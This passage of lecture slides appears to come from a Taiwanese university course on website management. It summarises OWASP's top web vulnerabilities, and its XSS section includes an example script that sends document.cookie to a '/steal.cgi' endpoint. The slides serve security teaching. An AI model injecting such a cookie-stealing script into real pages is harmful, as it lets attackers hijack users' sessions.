企业网站服务之建置与管理-国立暨南国际大学.PPT

OWASP Open Web Application Security Project (OWASP) /index.php/Taiwan 十大Web資安漏洞列表 A1.跨站腳本攻擊 (Cross Site Scripting，簡稱XSS) A2. 注入缺失(Injection Flaw)：SQL Injection與Command Injection A3. 惡意檔案執行(Malicious File Execution) A4. 不安全的物件參考(Insecure Direct Object Reference) A5. 跨網站的偽造要求 (Cross-Site Request Forgery，簡稱CSRF) A6. 資訊揭露與不適當錯誤 A7. 遭破壞的鑑別與連線管理 A8. 不安全的密碼儲存器 A9. 不安全的通訊(Insecure Communication) A10. 疏於限制URL存取(Failure to Restrict URL Access) 資料來源： OWASP台灣分會 OWASP: Open Web Application Security Project (2007) The Ten Most Critical Web Application Security Vulnerabilities Unvalidated Parameters Broken Access Control Broken Account and Session Management Cross-Site Scripting (XSS) Buffer Overflows Command Injection Flaws Error Handling Problems Insecure Use of Cryptography Remote Administration Flaws Web and Application Server Misconfiguration (1). Unvalidated Parameters Information from web requests is not validated before being used by a web application. Attackers can use these flaws to attack background components through a web application. (2). Broken Access Control Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access other users accounts, view sensitive files, or use unauthorized functions. /print.asp?id=u1257 (3). Broken Account and Session Management Account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users identities. (4). Cross-Site Scripting (XSS) The web application can be used as a mechanism to transport an attack to an end users browser. A successful attack can disclose the end users session token, attack the local machine, or spoof content to fool the user. XSS Example script window.location=/steal.cgi?ck=+document.cookie; /script ~留言版~ XSS Web Application Hijack Scenario (5). Buffer Overflows Web application components in some